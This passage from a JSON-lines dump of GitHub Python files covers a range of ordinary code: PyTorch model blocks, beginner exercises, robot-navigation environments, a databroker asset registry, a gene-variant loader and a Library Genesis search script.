norm_k)\n\n def forward(self, q, k, v):\n q = self.query_projection(q).unsqueeze(-1)\n k = self.key_projection(k).unsqueeze(-1)\n v = self.value_projection(v).unsqueeze(-1)\n s = self.dropout(self.cos_score(q, k))\n out = torch.matmul(s, v).squeeze(-1)\n return self.norm(q.squeeze(-1) + self.out_projection(out))\n\n\nclass TFBlock(nn.Module):\n def __init__(self, d_model):\n super().__init__()\n self.g_attn = Attention(d_model=d_model)\n self.p_attn = Attention(d_model=d_model)\n\n def forward(self, z_g, z_p):\n z_g = self.g_attn(z_g, z_p, z_p)\n z_p = self.p_attn(z_p, z_g, z_g)\n return z_g, z_p\n\n\nclass StyleBlock(nn.Module):\n def __init__(self, data_n: int, z_dim: int):\n super().__init__()\n self.n = data_n\n self.style = nn.Parameter(torch.Tensor(data_n, z_dim))\n self.reset_parameters()\n\n def reset_parameters(self):\n stdv = 1. / math.sqrt(self.style.size(1))\n self.style.data.uniform_(-stdv, stdv)\n\n def forward(self, z, batchid):\n if self.n == 1:\n return z - self.style\n else:\n s = torch.mm(batchid, self.style)\n return z - s","repo_name":"Catchxu/STANDS","sub_path":"stands/model/_block.py","file_name":"_block.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37541342384","text":"##set_a = []\n##def squares(i):\n## set_a = [i*i for i in range(0, i+1)]\n## return set_a\n##\n###main\n##print(squares(10))\n\n#-------------------------------------------------------------\n\n##numbers = []\n##userLower = int(input(\"Please enter a lower bound (int): \"))\n##userUpper = int(input(\"Please enter an upper bound (int): \"))\n##userDivide = int(input(\"Please enter a number to divide by (int): \"))\n##\n##numbers = [num for num in range (userLower, userUpper+1) if num%userDivide == 0]\n##print(\"All of the numbers between\", userLower ,\"and\", userUpper, \"that are divisible by\",userDivide,\":\", numbers)\n\n#--------------------------------------------------------------\nvowels=[\"a\", \"e\", \"i\", \"o\", \"u\"]\nfile_contents = [line.strip(\"\\n\") for line in open(\"words.txt\", \"r\")]\nprint(\"All words in the file:\", file_contents)\n\nfor word in file_contents: \n if word.strip(vowels) in word:\n print(\"The words in the file that contain 2 or more vowels:\", word)\n \n","repo_name":"morrisrl/Python_Scraping","sub_path":"1_23_18_practice.py","file_name":"1_23_18_practice.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13646260685","text":"\r\nimport math\r\nimport pika\r\nimport numpy as np\r\nimport callback\r\n\r\n\r\ndef simulate(time_serialized):\r\n \"\"\"\r\n Simulator function to make PV simulator\r\n \"\"\"\r\n mu = 10\r\n variance = 2\r\n sigma = math.sqrt(variance)\r\n # pv simulation using numpy expression\r\n return np.exp(time_serialized - mu)**2 / (2 * sigma**2)\r\n\r\n\r\ndef start_receive_msg():\r\n \"\"\"\r\n This method will consume the msgs from the rabbitmq\r\n \"\"\"\r\n connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\r\n channel = connection.channel()\r\n # queue declaration\r\n channel.queue_declare(queue='meter', durable=True)\r\n channel.basic_consume(queue='meter',\r\n on_message_callback=callback.callback_func)\r\n print('All messages are consumed.. Waiting for new messages')\r\n channel.start_consuming()\r\n\r\n\r\nif __name__ == '__main__':\r\n # Start receiving msg from Rabbit MQ\r\n start_receive_msg()\r\n\r\n","repo_name":"RahulNewbie/PV_Simulator","sub_path":"simulator/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"722650489","text":"from gibson.envs.env_modalities import CameraRobotEnv, BaseRobotEnv, SemanticRobotEnv\nfrom gibson.envs.husky_env import HuskyNavigateEnv\nfrom gibson.core.physics.robot_locomotors import Husky\nfrom gibson.data.datasets import get_model_path\nfrom gibson import assets\nimport numpy as np\nimport csv\nimport os\nimport subprocess, signal\n\ntracking_camera = {\n 'yaw': 110,\n 'z_offset': 0.5,\n 'distance': 1,\n 'pitch': -20\n}\n\nclass HuskyRandomEnv(HuskyNavigateEnv):\n def __init__(self, config, gpu_count=0):\n self.config = self.parse_config(config)\n assert(self.config[\"envname\"] == self.__class__.__name__ or self.config[\"envname\"] == \"TestEnv\")\n CameraRobotEnv.__init__(self, self.config, gpu_count, \n scene_type=\"building\",\n tracking_camera=tracking_camera)\n self.robot_introduce(Husky(self.config, env=self))\n self.scene_introduce()\n self.model_id = self.config[\"model_id\"]\n self.scenarios = self.get_scenarios(self.config[\"scenarios\"])\n self.n_scenarios = len(self.scenarios)\n\n def get_scenarios(self, scenario_size):\n scenarios_path = os.path.join(os.path.dirname(os.path.abspath(assets.__file__)), 'navigation_scenarios')\n scenario_file = os.path.join(scenarios_path, 'pointgoal_gibson_{}_v1.csv'.format(scenario_size))\n scenarios = []\n with open(scenario_file, 'r') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=',')\n for row in reader:\n if row['sceneId'] == self.model_id:\n scenarios.append(row)\n return scenarios\n\n def _reset(self):\n scenario_index = np.random.randint(self.n_scenarios)\n scenario = self.scenarios[scenario_index]\n self.config[\"initial_pos\"] = [float(scenario['startX']),\n float(scenario['startY']),\n float(scenario['startZ']) + 0.5]\n self.config[\"target_pos\"] = [float(scenario['goalX']),\n float(scenario['goalY']),\n float(scenario['goalZ'])]\n print(\"xi\", self.config[\"initial_pos\"])\n return super(HuskyRandomEnv, self)._reset()\n\n\nclass HuskyMultiSceneEnv(HuskyNavigateEnv):\n def __init__(self, config, gpu_count=0):\n self.config = self.parse_config(config)\n assert(self.config[\"envname\"] == self.__class__.__name__ or self.config[\"envname\"] == \"TestEnv\")\n CameraRobotEnv.__init__(self, self.config, gpu_count, \n scene_type=\"building\",\n tracking_camera=tracking_camera)\n self.robot_introduce(Husky(self.config, env=self))\n self.scenarios = self.get_scenarios(self.config[\"scenarios\"])\n self.n_scenarios = len(self.scenarios)\n\n def get_scenarios(self, scenario_size):\n scenarios_path = os.path.join(os.path.dirname(os.path.abspath(assets.__file__)), 'navigation_scenarios')\n scenario_file = os.path.join(scenarios_path, 'pointgoal_gibson_{}_v1.csv'.format(scenario_size))\n with open(scenario_file, 'r') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=',')\n return [row for row in reader]\n\n def kill_depth_render(self):\n process = subprocess.Popen(['ps', '-A'], stdout=subprocess.PIPE)\n out, err = process.communicate()\n for line in out.splitlines():\n if 'depth_render' in str(line):\n pid = int(line.split(None, 1)[0])\n os.kill(pid, signal.SIGKILL)\n print(\"Successfully killed depth_render\")\n\n def _reset(self):\n # Randomly select a scenario\n scenario_index = np.random.randint(self.n_scenarios)\n scenario = self.scenarios[scenario_index]\n print(\"Selected scenario:\", scenario)\n self.model_id = self.config[\"model_id\"] = scenario['sceneId']\n self.model_path = get_model_path(self.model_id)\n self.config[\"initial_pos\"] = [float(scenario['startX']),\n float(scenario['startY']),\n float(scenario['startZ'])]\n self.config[\"target_pos\"] = [float(scenario['goalX']),\n float(scenario['goalY']),\n float(scenario['goalZ'])]\n\n self.config[\"target_orn\"] = [0, 0, 0]\n self.config[\"initial_orn\"] = [0, 0, float(scenario['startAngle'])]\n self.kill_depth_render()\n self.setup_rendering_camera()\n self.scene_introduce()\n return super(HuskyMultiSceneEnv, self)._reset()","repo_name":"alexsax/midlevel-reps","sub_path":"gibson/gibson/envs/random_env.py","file_name":"random_env.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"37"} +{"seq_id":"20636634407","text":"import sys\ninput = sys.stdin.readline\n\n\nclass Solution: \n def ACM_hotel(self, H: int, W: int, N: int):\n floor = str(N%H)\n door = str((N//H)+1)\n if floor == '0':\n floor = str(H)\n door = str((N//H))\n if len(door) == 1:\n door = '0' + door\n return floor + door\n \n\n\nfor _ in range(int(input())):\n H, W, N = map(int, input().split())\n print(Solution().ACM_hotel(H,W,N))","repo_name":"PARKINHYO/Algorithm","sub_path":"BOJ/10250/10250.py","file_name":"10250.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"25063702068","text":"from words import words\nimport random\nimport string\n\n\ndef valid_word():\n word = random.choice(words)\n while True:\n if '-' not in word and ' ' not in word:\n return word\n\n\ndef hangman():\n word = valid_word().upper()\n letters_guessed = set()\n letters_to_guess = set(word)\n validator = set(string.ascii_uppercase)\n lives = 6\n\n while len(letters_to_guess) > 0 and lives > 0:\n print(\"Letters used: \", \" \".join(letters_guessed))\n current_word = [letter if letter in letters_guessed else '_' for letter in word]\n print(f\"Current Lives: {lives}, Current word: \", \" \".join(current_word))\n letter = input(\"Guess the word: \").upper()\n if letter in validator - letters_guessed:\n if letter in letters_to_guess:\n letters_guessed.add(letter)\n letters_to_guess.remove(letter)\n\n else:\n # wrong word or word already in guessed word list\n letters_guessed.add(letter)\n lives -= 1\n\n elif letter in letters_guessed:\n print(\"You have already guessed the letter.\")\n else:\n print(\"Invalid letter entered.\")\n\n if lives == 0:\n print(f\"You lost, the word was {word}\")\n else:\n print(\"Congratulations You won!!!\")\n\n\nhangman()","repo_name":"azizmalik787/pythonProjects","sub_path":"hangman_game/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6747793190","text":"from __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport six\nfrom jsonschema import validate as js_validate\nimport warnings\nimport uuid\nimport time as ttime\nimport pandas as pd\nfrom ..utils import sanitize_np, apply_to_dict_recursively\n\n\nclass DatumNotFound(Exception):\n \"\"\"\n Raised if a Datum id is not found.\n \"\"\"\n def __init__(self, datum_id, msg=None, *args):\n if msg is None:\n msg = f\"No datum found with datum id {datum_id}\"\n super().__init__(msg, *args)\n self.datum_id = datum_id\n\n\nclass EventDatumNotFound(Exception):\n \"\"\"\n Raised if an Event document is found to have an unknown Datum id.\n \"\"\"\n def __init__(self, event_uid, datum_id, msg=None, *args):\n if msg is None:\n msg = (\n f\"Event with uid {event_uid} references \"\n f\"unknown Datum with datum id {datum_id}\"\n )\n super().__init__(msg, *args)\n self.event_uid = event_uid\n self.datum_id = datum_id\n\n\ndef doc_or_uid_to_uid(doc_or_uid):\n \"\"\"Given Document or uid return the uid\n\n Parameters\n ----------\n doc_or_uid : dict or str\n If str, then assume uid and pass through, if not, return\n the 'uid' field\n\n Returns\n -------\n uid : str\n A string version of the uid of the given document\n\n \"\"\"\n if not isinstance(doc_or_uid, six.string_types):\n doc_or_uid = doc_or_uid['uid']\n return doc_or_uid\n\n\ndef _get_datum_from_datum_id(col, datum_id, datum_cache, logger):\n try:\n datum = datum_cache[datum_id]\n except KeyError:\n # find the current document\n edoc = col.find_one({'datum_id': datum_id})\n if edoc is None:\n raise DatumNotFound(datum_id=datum_id)\n # save it for later\n datum = dict(edoc)\n\n res = edoc['resource']\n count = 0\n for dd in col.find({'resource': res}):\n count += 1\n d_id = dd['datum_id']\n if d_id not in datum_cache:\n datum_cache[d_id] = dict(dd)\n if count > datum_cache.max_size:\n logger.warn(\"More datum in a resource than your \"\n \"datum cache can hold.\")\n\n datum.pop('_id', None)\n return datum\n\n\ndef retrieve(col, datum_id, datum_cache, get_spec_handler, logger):\n datum = _get_datum_from_datum_id(col, datum_id, datum_cache, logger)\n handler = get_spec_handler(datum['resource'])\n return handler(**datum['datum_kwargs'])\n\n\ndef resource_given_datum_id(col, datum_id, datum_cache, logger):\n datum_id = doc_or_uid_to_uid(datum_id)\n datum = _get_datum_from_datum_id(col, datum_id, datum_cache, logger)\n res = datum['resource']\n return res\n\n\ndef resource_given_uid(col, resource):\n uid = doc_or_uid_to_uid(resource)\n ret = col.find_one({'uid': uid})\n ret.pop('_id', None)\n ret['id'] = ret['uid']\n return ret\n\n\ndef bulk_insert_datum(col, resource, datum_ids,\n datum_kwarg_list):\n\n resource_id = doc_or_uid_to_uid(resource)\n\n def datum_factory():\n for d_id, d_kwargs in zip(datum_ids, datum_kwarg_list):\n datum = dict(resource=resource_id,\n datum_id=str(d_id),\n datum_kwargs=dict(d_kwargs))\n apply_to_dict_recursively(datum, sanitize_np)\n yield datum\n\n col.insert_many(datum_factory())\n\n\ndef bulk_register_datum_table(datum_col,\n resource_uid,\n dkwargs_table,\n validate):\n if validate:\n raise\n\n d_ids = [str(uuid.uuid4()) for j in range(len(dkwargs_table))]\n dkwargs_table = pd.DataFrame(dkwargs_table)\n bulk_insert_datum(datum_col, resource_uid, d_ids, [\n dict(r) for _, r in dkwargs_table.iterrows()])\n return d_ids\n\n\ndef register_datum(col, resource_uid, datum_kwargs):\n datum_uid = str(uuid.uuid4())\n datum = insert_datum(col, resource_uid, datum_uid, datum_kwargs, {}, None)\n return datum['datum_id']\n\n\ndef insert_datum(col, resource, datum_id, datum_kwargs, known_spec,\n resource_col, ignore_duplicate_error=False,\n duplicate_exc=None):\n if ignore_duplicate_error:\n assert duplicate_exc is not None\n\n if duplicate_exc is None:\n class _PrivateException(Exception):\n pass\n duplicate_exc = _PrivateException\n try:\n resource['spec']\n spec = resource['spec']\n\n if spec in known_spec:\n js_validate(datum_kwargs, known_spec[spec]['datum'])\n except (AttributeError, TypeError):\n pass\n\n resource_uid = doc_or_uid_to_uid(resource)\n\n datum = dict(resource=resource_uid,\n datum_id=str(datum_id),\n datum_kwargs=dict(datum_kwargs))\n apply_to_dict_recursively(datum, sanitize_np)\n # We are transitioning from ophyd objects inserting directly into a\n # Registry to ophyd objects passing documents to the RunEngine which in\n # turn inserts them into a Registry. During the transition period, we allow\n # an ophyd object to attempt BOTH so that configuration files are\n # compatible with both the new model and the old model. Thus, we need to\n # ignore the second attempt to insert.\n try:\n col.insert_one(datum)\n except duplicate_exc:\n if ignore_duplicate_error:\n warnings.warn(\"Ignoring attempt to insert Resource with duplicate \"\n \"uid, assuming that both ophyd and bluesky \"\n \"attempted to insert this document. Remove the \"\n \"Registry (`reg` parameter) from your ophyd \"\n \"instance to remove this warning.\")\n else:\n raise\n # do not leak mongo objectID\n datum.pop('_id', None)\n\n return datum\n\n\ndef insert_resource(col, spec, resource_path, resource_kwargs,\n known_spec, root, path_semantics='posix', uid=None,\n run_start=None, id=None,\n ignore_duplicate_error=False, duplicate_exc=None):\n \"\"\"Insert resource into a databroker.\n\n Parameters\n ----------\n col : pymongo.Collection instance\n Collection to insert data into\n spec : str\n The resource data spec\n resource_path : str\n The path to the resource files\n resource_kwargs : dict\n The kwargs for the resource\n known_spec : set\n The known specs\n root : str\n The root of the file path\n path_semantics : str, optional\n The name of the path semantics, e.g. ``posix`` for Linux systems\n uid : str, optional\n The unique ID for the resource\n run_start : str, optional\n The unique ID for the start document the resource is associated with\n id : str, optional\n Dummy variable so that we round trip resources, same as ``uid``\n\n Returns\n -------\n resource_object : dict\n The resource\n \"\"\"\n if ignore_duplicate_error:\n assert duplicate_exc is not None\n if duplicate_exc is None:\n class _PrivateException(Exception):\n pass\n duplicate_exc = _PrivateException\n resource_kwargs = dict(resource_kwargs)\n if spec in known_spec:\n js_validate(resource_kwargs, known_spec[spec]['resource'])\n if uid is None:\n uid = str(uuid.uuid4())\n\n resource_object = dict(spec=str(spec),\n resource_path=str(resource_path),\n root=str(root),\n resource_kwargs=resource_kwargs,\n path_semantics=path_semantics,\n uid=uid)\n # This is special-cased because it was added later.\n # Someday this may be required and no longer special-cased.\n if run_start is not None:\n resource_object['run_start'] = run_start\n # We are transitioning from ophyd objects inserting directly into a\n # Registry to ophyd objects passing documents to the RunEngine which in\n # turn inserts them into a Registry. During the transition period, we allow\n # an ophyd object to attempt BOTH so that configuration files are\n # compatible with both the new model and the old model. Thus, we need to\n # ignore the second attempt to insert.\n try:\n col.insert_one(resource_object)\n except duplicate_exc:\n if ignore_duplicate_error:\n warnings.warn(\"Ignoring attempt to insert Datum with duplicate \"\n \"datum_id, assuming that both ophyd and bluesky \"\n \"attempted to insert this document. Remove the \"\n \"Registry (`reg` parameter) from your ophyd \"\n \"instance to remove this warning.\")\n else:\n raise\n resource_object['id'] = resource_object['uid']\n resource_object.pop('_id', None)\n return resource_object\n\n\ndef update_resource(update_col, resource_col, old, new, cmd, cmd_kwargs):\n '''Update a resource document\n\n Parameters\n ----------\n update_col : Collection\n The collection to record audit trail in\n resource_col : Collection\n The resource collection\n\n old : dict\n The old resource document\n\n new : dict\n The new resource document\n\n cmd : str\n The name of the operation which generated this update\n\n cmd_kwargs : dict\n The arguments that went into the update (excluding the resource id)\n\n\n Returns\n -------\n ret : dict\n The new resource document\n\n log_object : dict\n The history object inserted (with oid removed)\n '''\n if old['uid'] != new['uid']:\n raise RuntimeError('must not change the resource uid')\n uid = old['uid']\n log_object = {'resource': uid,\n 'old': old,\n 'new': new,\n 'time': ttime.time(),\n 'cmd': cmd,\n 'cmd_kwargs': cmd_kwargs}\n\n update_col.insert_one(log_object)\n result = resource_col.replace_one({'uid': uid}, new)\n ret = resource_given_uid(resource_col, uid)\n # TODO look inside of result\n del result\n log_object.pop('_id', None)\n return ret, log_object\n\n\ndef get_resource_history(col, resource):\n uid = doc_or_uid_to_uid(resource)\n cursor = col.find({'resource': uid})\n for doc in cursor:\n for k in ['new', 'old']:\n d = doc[k]\n d.pop('_id', None)\n d['id'] = d['uid']\n doc[k] = d\n doc.pop('_id', None)\n yield doc\n\n\ndef get_datumkw_by_resuid_gen(datum_col, resource_uid):\n '''Given a resource uid, get all datum_kwargs\n\n No order is guaranteed.\n\n Internally the result of this is passed to the `get_file_list` method\n of the handler object in `change_root`\n\n Parameters\n ----------\n datum_col : Collection\n The Datum collection\n\n resource_uid : dict or str\n The resource to work on\n\n Yields\n ------\n datum_kwarg : dict\n '''\n resource_uid = doc_or_uid_to_uid(resource_uid)\n cur = datum_col.find({'resource': resource_uid})\n\n for d in cur:\n yield d['datum_kwargs']\n\n\ndef get_datum_by_res_gen(datum_col, resource_uid):\n '''Given a resource uid, get all datums\n\n No order is guaranteed.\n\n Internally the result of this is passed to the `get_file_list` method\n of the handler object in `change_root`\n\n Parameters\n ----------\n datum_col : Collection\n The Datum collection\n\n resource_uid : dict or str\n The resource to work on\n\n Yields\n ------\n datum : dict\n '''\n resource_uid = doc_or_uid_to_uid(resource_uid)\n cur = datum_col.find({'resource': resource_uid})\n\n for d in cur:\n yield d\n\n\ndef get_file_list(resource, datum_kwarg_gen, get_spec_handler):\n \"\"\"\n Given a resource and an iterable of datum kwargs, get a list of\n associated files.\n\n DO NOT USE FOR COPYING OR MOVING. This is for debugging only.\n See the methods for moving and copying on the Registry object.\n \"\"\"\n handler = get_spec_handler(resource['uid'])\n return handler.get_file_list(datum_kwarg_gen)\n","repo_name":"bluesky/databroker","sub_path":"databroker/assets/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":12173,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"37"} +{"seq_id":"13275713028","text":"\"\"\"\nThis script will run once when the serve runs.\nIt uses the csv module to go through all the rows.\nFor every single row, it will ignore the rows that do not have either gene or nucleotide_change listed.\nFor the rows that have both of them listed, it will check if the key (gene) exists in the cache.\n\tIf the key (gene) exists in the cache, the details will be appended to the values of the key.\n\tIf the key (gene) does not exist in the cache, a new key, value pair will be created in the cache.\n\"\"\"\n\nimport csv\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nGENE_CACHE = {}\n\n\ndef create_cache():\n print(\"Ran once!\")\n with open(f'{BASE_DIR}/data/variants.tsv', 'r', encoding=None) as tsvin:\n tsvin = csv.reader(tsvin, delimiter='\\t')\n for row in tsvin:\n current = {\n 'gene': row[0],\n 'nucleotide_change': row[1],\n 'protein_change': row[2],\n 'other_mappings': row[3],\n 'alias': row[4],\n 'transcripts': row[5],\n 'region': row[6],\n 'reported_classification': row[7],\n 'inferred_classification': row[8],\n 'source': row[9],\n 'last_evaluated': row[10],\n 'last_updated': row[11],\n 'url': row[12],\n 'submitter_comment': row[13]\n # 'assembly': row[14],\n # 'chr': row[15],\n # 'genomic_start': row[16],\n # 'genomic_stop': row[17],\n # 'ref': row[18],\n # 'alt': row[19],\n # 'accession': row[20],\n # 'reported_ref': row[21],\n # 'reported_alt': row[22]\n }\n if row[0] != \"\" and row[1] != \"\" and row[0] not in GENE_CACHE:\n GENE_CACHE[row[0]] = [current]\n elif row[0] != \"\" and row[1] != \"\":\n GENE_CACHE[row[0]].append(current)\n return GENE_CACHE\n","repo_name":"rja907/g-v","sub_path":"src/api/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9577788856","text":"class MatrixAdditionError(Exception):\n pass\n\n\nclass Matrix:\n def __init__(self, elements=None):\n self.elements = elements if elements else []\n self.rows = len(self.elements)\n self.columns = len(self.elements[0]) if elements else 0\n self.dimension = (self.rows, self.columns)\n\n def __str__(self):\n return '\\n'.join(' '.join(str(element) for element in row) for row in self.elements)\n\n def __add__(self, other):\n if self.dimension != other.dimension:\n raise MatrixAdditionError('Dimensions of matrices must be the same')\n\n new_matrix = [\n [element_1 + element_2 for element_1, element_2 in zip(row_1, row_2)]\n for row_1, row_2 in zip(self.elements, other.elements)\n ]\n\n return Matrix(new_matrix)\n\n\na = Matrix([[1, 2, 3], [4, 5, 6]])\nb = Matrix([[10, 32.3, 4], [-10, 0, 54.9]])\nc = Matrix([[1, 2], [3, 4]])\nprint(a + b)\nprint(type(a + b))\nprint(a + c)\n\n# output example\n\n# 11 34.3 7\n# -6 5 60.9\n# \n# Traceback (most recent call last):\n# File \"D:/VSCodeFiles/de_python_course/Kulushev_Konstantin_dz_10_task_1.py\", line 32, in \n# print(a + c)\n# File \"D:/VSCodeFiles/de_python_course/Kulushev_Konstantin_dz_10_task_1.py\", line 17, in __add__\n# raise MatrixAdditionError('Dimensions of matrices must be the same')\n# __main__.MatrixAdditionError: Dimensions of matrices must be the same\n","repo_name":"demade74/de_course","sub_path":"q1/python/Kulushev_Konstantin_dz_10/Kulushev_Konstantin_dz_10_task_1.py","file_name":"Kulushev_Konstantin_dz_10_task_1.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30149109251","text":"# 위상정렬 구현하기\nfrom collections import deque\n\n# 노드와 간선 입력받기\nv, e = map(int, input().split())\n\n# 진입차수 리스트 선언\nindegree = [0] * (v+1)\n\n# 그래프 입력받기\ngraph = [ [] for i in range(v+1)]\nfor _ in range(e):\n a,b = map(int, input().split())\n graph[a].append(b)\n indegree[b] += 1\n# print( graph[1:] )\n# print( indegree[1:] )\n\n# deque선언\nq = deque()\nfor i in range(1, v+1):\n if indegree[i] == 0:\n q.append(i)\n\n#위상정렬 솔루션\ndef solution():\n while q:\n # q 가장 왼쪽값 pop\n now = q.popleft()\n print ( now )\n # now노드에 연결된 간선 제거\n for i in graph[now]:\n indegree[i] -= 1\n\n if indegree[i] == 0:\n q.append(i)\n\nsolution()","repo_name":"Imseungbae/algorithm","sub_path":"topological_sort.py","file_name":"topological_sort.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42868010352","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/120902\n\ndef solution(my_string):\n answer = 0\n op = 1\n for i,s in enumerate(my_string.split(' ')):\n if i % 2 == 0:\n answer += int(s) * op\n else:\n op = 1 if s == '+' else -1\n return answer\n","repo_name":"yongsun-yoon/python-algorithms","sub_path":"programmers/120902.py","file_name":"120902.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25580103898","text":"\n'''\nimport CA to ZD\nCreated on Nov 12, 2014\n@author: Yu.yanan@odc-ruckuswireless.com\n'''\n\nimport logging\nimport time\nimport os\n\nfrom RuckusAutoTest.components.lib.zd import control_zd as control_zd\nfrom RuckusAutoTest.common.utils import list_to_dict\nfrom RuckusAutoTest.components.lib.zd import widgets_zd as wgt\nfrom RuckusAutoTest.components.lib.zd import aps\n\nlocators = dict(\n advanced_options_anchor = r\"//tr[@id='advance']//a[@href='#']\",\n cover_ca_radio = r\"//input[@id='cover_CA']\",\n loc_brower_select_ca = r\"//input[@id='filename-uploadCA']\",\n loc_ca_upload_button = r\"//input[@id='perform-uploadCA']\",\n loc_admin_ca_upload_error_span = r\"//span[@id='error-uploadCA']\",\n\n)\ndef _nav_to(zd):\n return zd.navigate_to(zd.CONFIGURE, zd.CONFIGURE_CERTIFICATE)\n\n\ndef _import_ca(zd,ca_path):\n _nav_to(zd)\n \n if os.path.exists(ca_path):\n logging.info('The ca file exists')\n else:\n raise Exception(\"The CA do not exists.please check it.\")\n\n zd.s.click_and_wait(locators['advanced_options_anchor'])\n zd.s.click_and_wait(locators['cover_ca_radio'])\n \n browser_ca_field = locators['loc_brower_select_ca']\n if not zd.s.is_element_present(browser_ca_field):\n raise Exception(\"The field to select ca file is not present\")\n try:\n zd.s.type(browser_ca_field,ca_path)\n except:\n raise Exception(\"Can not set value %s to the locator %s\" % (ca_path, browser_ca_field))\n \n upload_ca_button = locators['loc_ca_upload_button']\n \n if not zd.s.is_element_present(upload_ca_button):\n raise Exception(\"The button to upload ca file is not present\")\n zd.s.click_and_wait(upload_ca_button)\n logging.info('click upload ca button.')\n \n if zd.s.is_confirmation_present(5):\n cfm=zd.s.get_confirmation()\n logging.info(\"There's a confirmation:\\n%s\"%cfm)\n logging.info('Clicked OK')\n if zd.s.is_element_visible(locators['loc_admin_ca_upload_error_span']):\n msg = zd.s.get_text(locators['loc_admin_ca_upload_error_span'])\n if not msg.find('successful'):\n raise Exception(msg)\n \n \n \n\n ","repo_name":"jichunwei/MyGitHub-1","sub_path":"saigon/rat/RuckusAutoTest/components/lib/zd/config_certificate.py","file_name":"config_certificate.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37531303305","text":"#!/usr/bin/env python3\n# command-line utility to search libgen api for title and author\nimport argparse\nimport json\nfrom libgen_api import LibgenSearch\n\nparser = argparse.ArgumentParser(\n description=\"Command-line utility to parse libgen API search results for author and/or title.\")\nparser.add_argument(\"--title\", type=str,\n help=\"The title of what you would like to search.\")\nparser.add_argument(\"--author\", type=str,\n help=\"The author of the work you would like to search.\")\n\nargs = parser.parse_args()\n\ns = LibgenSearch()\n\ndef format_result(header_line, result, result_count):\n line_seperator = \"------------\" * 6\n download_links = s.resolve_download_links(result)\n\n print(header_line)\n print(\"Result count: {}\".format(result_count))\n print(line_seperator)\n print(json.dumps(result, indent=2))\n print(line_seperator)\n print(\"Download links:\")\n print(json.dumps(download_links, indent=2))\n print(line_seperator)\n\n\ndef search_title(title):\n results = s.search_title(title)\n result_count = 0\n for result in results:\n result_count += 1\n header_line = \"Title Search {}\".format(title)\n\n format_result(header_line, result, result_count)\n\n\ndef search_author(author):\n results = s.search_author(author)\n result_count = 0\n for result in results:\n result_count += 1\n header_line = \"Author Search: {}\".format(author)\n\n format_result(header_line, result, result_count)\n\n\nif args.title:\n search_title(args.title)\nelif args.author:\n search_author(args.author)\nelse:\n print(\"Please provide a title or author.\")\n exit\n","repo_name":"JSriwongsa/libgen_tools","sub_path":"libgen_searcher.py","file_name":"libgen_searcher.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19912621072","text":"l_t = ['в', '5', 'часов', '17', 'минут', 'температура', 'воздуха', 'была', '+5', 'градусов']\n\ni = 0\n\nfor i in l_t:\n if i.isdigit():\n l_t.extend(['\"', f'{i.zfill(2)}', '\"'])\n elif i.startswith('+'):\n l_t.extend(['\"', f'{i.zfill(3)}', '\"'])\n\n else:\n l_t.append(i)\n\n print(l_t)\n\n# while n < len(l_t):\n# if l_t[i].isdigit():\n# l_t[i] = l_t[i].zfill(2)\n# elif l_t[i].startswith('+'):\n# l_t[i] = l_t[i].zfill(3)\n# i += 1\n# n = 1\n# while n < len(l_t):\n# if l_t[n].isdigit():\n# l_t.insert(n, '\"')\n# l_t.insert(n + 2, '\"')\n# n +=2\n#\n# print(l_t)","repo_name":"Amor2302/lesson_3","sub_path":"lesson_2/копия.py","file_name":"копия.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29675741945","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n# primitive sanity tests\n\nfrom __future__ import unicode_literals\n\nimport os\nimport sys\nimport shutil\nimport re\nimport pprint\nimport copy\nimport time\nif sys.version_info[0] == 3:\n\tbasestring = str\n\nTestGarbledPathNames = False\n\n# store the output, for further analysis\nclass StorePrinter(object):\n\tdef __init__(self, opr):\n\t\tself.opr = opr\n\t\tself.q = []\n\n\tdef pr(self, msg):\n\t\tself.q.append(msg)\n\t\tself.opr(msg)\n\n\tdef empty(self):\n\t\tdel self.q[:]\n\n\tdef getq(self):\n\t\treturn self.q\n\ndef banner(msg):\n\ttitle = \"{0} {1} {0}\".format('=' * 8, msg)\n\tline = '=' * len(title)\n\tprint(line)\n\tprint(title)\n\tprint(line)\n\ndef ifany(list, require):\n\tfor element in list:\n\t\tif require(element):\n\t\t\treturn True\n\n\treturn False\n\ndef filterregex(list, regex):\n\trec = re.compile(regex)\n\treturn 